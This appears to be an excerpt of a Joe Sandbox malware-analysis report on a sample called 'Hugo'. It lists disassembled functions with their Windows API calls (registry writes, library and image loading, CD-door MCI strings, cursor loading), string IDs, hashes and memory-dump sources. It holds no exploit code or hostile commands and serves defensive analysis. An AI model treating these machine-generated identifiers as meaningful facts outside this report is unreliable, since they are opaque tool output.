                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                                                              • Opcode ID: 62fc2fe9e8656f4c069d9d1b0fdbff4e6eca460291bb0755853d3f7c1cb702d4
                                                                                                                                                                                                              • Instruction ID: fb77a890b6fe22cf43d91e932e70e53917ed3fbe68d35395a0871544dceec32e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62fc2fe9e8656f4c069d9d1b0fdbff4e6eca460291bb0755853d3f7c1cb702d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A714FB1D00209ABDF10DFA9DC44FEEBBB8BF05310F148226E919A6191D7359909DB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9CF1D
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FADCD0,00000000,?,00000000,?,?), ref: 00F9CFA4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F9D004
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9D054
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9D0CF
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F9D112
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F9D221
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F9D2AD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00F9D2E1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9D2EE
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F9D3C0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                              • API String ID: 9721498-966354055
                                                                                                                                                                                                              • Opcode ID: 67575f83989472bda192d34f1e292d8b460d08eb9d7718cf5fb985d5651e2f83
                                                                                                                                                                                                              • Instruction ID: 29dcc95c8758e852a05e8feef5b99b26bd64b316cf23e918858cac7dd402f4fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67575f83989472bda192d34f1e292d8b460d08eb9d7718cf5fb985d5651e2f83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6127B356042019FDB14DF14C881A6ABBE5FF88764F14845DF88A9B3A2CB35FD42EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00FA1462
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA149D
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA14F0
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA1526
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA15A2
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA161D
                                                                                                                                                                                                                • Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D
                                                                                                                                                                                                                • Part of subcall function 00F73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F73547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                              • API String ID: 1103490817-4258414348
                                                                                                                                                                                                              • Opcode ID: e3b1a9fc65e50daa3aed78fe39f449065d82b2d9234da4f098444c8f5ebbed56
                                                                                                                                                                                                              • Instruction ID: bea713cb9bdd826566108f4486a5661bd7a2a776d080ce6347fa7b3182ed3465
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3b1a9fc65e50daa3aed78fe39f449065d82b2d9234da4f098444c8f5ebbed56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E1E472A043018FC700DF24C85096AB7E2FF9A354F19895DF8969B3A2DB34ED45EB81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                              • API String ID: 1256254125-909552448
                                                                                                                                                                                                              • Opcode ID: 2f08ef2e73bb8375599021d2e2d239ddb17a3fdabd7dc6f316e69a28650f81b7
                                                                                                                                                                                                              • Instruction ID: 2cb7b349589e135d688f84d6be7ad0e6d9749420af7b198d5c3b5c73ef83ae8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f08ef2e73bb8375599021d2e2d239ddb17a3fdabd7dc6f316e69a28650f81b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2571E933E0012A8BDF10DE7CCD506BA33A19B617B4B3A0125E85697295EA35DD45F760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA8DB5
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA8DC9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA8DEC
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA8E0F
                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FA8E4D
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FA6691), ref: 00FA8EA9
                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8EE2
                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FA8F25
                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8F5C
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00FA8F68
                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FA8F78
                                                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00FA6691), ref: 00FA8F87
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FA8FA4
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FA8FB0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                                                              • API String ID: 799131459-1154884017
                                                                                                                                                                                                              • Opcode ID: 7da6f070ddcfb5213ebaeb63a7d6d21c1fd6b4b780054567bc49c8158e72ef44
                                                                                                                                                                                                              • Instruction ID: 2c04853bbeaec9df27cf1e4b8747f5a3349a3a26145a8dd104b7dc37f41e7022
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da6f070ddcfb5213ebaeb63a7d6d21c1fd6b4b780054567bc49c8158e72ef44
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B61D3B1900219FEEB14DF64CC41BBE77ACBF0AB60F104106F815D61D1DBB4A991EBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00F8493D
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F84948
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F8499F
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F849DD
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00F84A1B
                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84A63
                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84A9E
                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84ACC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                              • API String ID: 1839972693-4113822522
                                                                                                                                                                                                              • Opcode ID: 15d165728490b76a179d687d29244e8ef6ef66e8e36bb5698354682a1144534c
                                                                                                                                                                                                              • Instruction ID: 3bed7a74f685aa39863d62b637087d4e87b98b10ca748410cb431bb3b7f15063
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15d165728490b76a179d687d29244e8ef6ef66e8e36bb5698354682a1144534c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC71C232A083128FC710FF24C8409ABB7E5EF94768F50492DF89597251EB34ED45EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00F76395
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F763A7
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00F763BE
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00F763D3
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00F763D9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00F763E9
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00F763EF
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F76410
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F7642A
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F76433
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7649A
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00F764D6
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00F764DC
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00F764E3
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F7653A
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00F76547
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F7656C
                                                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F76596
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 895679908-0
                                                                                                                                                                                                              • Opcode ID: 52756695035d1c8aeeca6f716cd9902342d0ad9eafdd90eb944a9c37d00dcc4d
                                                                                                                                                                                                              • Instruction ID: f9659d6fa1ef69a88dd51015a55f3604a93390c8a533fff9511e1eb0e2975069
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52756695035d1c8aeeca6f716cd9902342d0ad9eafdd90eb944a9c37d00dcc4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A71A071900B09AFDB20DFA8CE45BAEBBF5FF08714F104519E18AE26A0D775E940EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00F90884
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00F9088F
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F9089A
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00F908A5
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00F908B0
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00F908BB
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00F908C6
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00F908D1
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00F908DC
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00F908E7
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00F908F2
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00F908FD
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00F90908
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00F90913
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00F9091E
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00F90929
                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 00F90939
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F9097B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215588206-0
                                                                                                                                                                                                              • Opcode ID: 7c459652ca2cc7b80ce3a54a5241006da957366cf6e6f8cb9d50abc8b9dbfa2e
                                                                                                                                                                                                              • Instruction ID: e8e2300c1bbfa23ff9763f8c2b1689855099c02e35e74b02a886a340eb2409c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c459652ca2cc7b80ce3a54a5241006da957366cf6e6f8cb9d50abc8b9dbfa2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D94154B0D083196EDB10DFBA8C8585EBFE8FF44764B50452AE11DE7291DA789801CF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F30436
                                                                                                                                                                                                                • Part of subcall function 00F3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00FE170C,00000FA0,9017C7ED,?,?,?,?,00F52733,000000FF), ref: 00F3048C
                                                                                                                                                                                                                • Part of subcall function 00F3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F52733,000000FF), ref: 00F30497
                                                                                                                                                                                                                • Part of subcall function 00F3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F52733,000000FF), ref: 00F304A8
                                                                                                                                                                                                                • Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F304BE
                                                                                                                                                                                                                • Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F304CC
                                                                                                                                                                                                                • Part of subcall function 00F3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F304DA
                                                                                                                                                                                                                • Part of subcall function 00F3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30505
                                                                                                                                                                                                                • Part of subcall function 00F3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30510
                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 00F30457
                                                                                                                                                                                                                • Part of subcall function 00F30413: __onexit.LIBCMT ref: 00F30419
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F30492
                                                                                                                                                                                                              • InitializeConditionVariable, xrefs: 00F304B8
                                                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 00F304D2
                                                                                                                                                                                                              • kernel32.dll, xrefs: 00F304A3
                                                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 00F304C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                              • API String ID: 66158676-1714406822
                                                                                                                                                                                                              • Opcode ID: 1a47f7c332ccf1d5b25a8d2b0b76d1c39be193b985bd614394e264a6a9d95f0e
                                                                                                                                                                                                              • Instruction ID: 88132f831d1ea8e0b3b7a741a7ed6739489c626e5c500fb57114ca62a9f6c34c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a47f7c332ccf1d5b25a8d2b0b76d1c39be193b985bd614394e264a6a9d95f0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1321F372A407086BD7246BA5EC56BAA3798EB49FB2F040127F902D7690DF74D800BA52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                              • API String ID: 176396367-1603158881
                                                                                                                                                                                                              • Opcode ID: 5f40012547d504f5dad19434db85c5a0e3c6ee2401b06fd353f8cd5be383be6b
                                                                                                                                                                                                              • Instruction ID: 9c1076d5b46d0442d025effb37898010ff2a174210bcbeb9febf17ceb1dea386
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f40012547d504f5dad19434db85c5a0e3c6ee2401b06fd353f8cd5be383be6b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03E1C332E00516BBCB189F68C8517EDBBB1BF54760F14812BE45AE7250DB30AA89B791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharLowerBuffW.USER32(00000000,00000000,00FADCD0), ref: 00F84F6C
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F84F80
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F84FDE
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F85039
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F85084
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F850EC
                                                                                                                                                                                                                • Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,00FD7C10,00000061), ref: 00F85188
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                              • API String ID: 2055661098-1000479233
                                                                                                                                                                                                              • Opcode ID: c298af4ba2fd0da7edb778f9918e09bc738e7a0ff72e6c3b8f8c578a8e1bf199
                                                                                                                                                                                                              • Instruction ID: 116be8ba469f2c6a10500b8bde6ef469d90830adcc58bf2013b3de6afd48feb9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c298af4ba2fd0da7edb778f9918e09bc738e7a0ff72e6c3b8f8c578a8e1bf199
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FB1F731A087029FC710FF28CC90AAAB7E5BF94B60F50491DF596C7291DB34D884E792
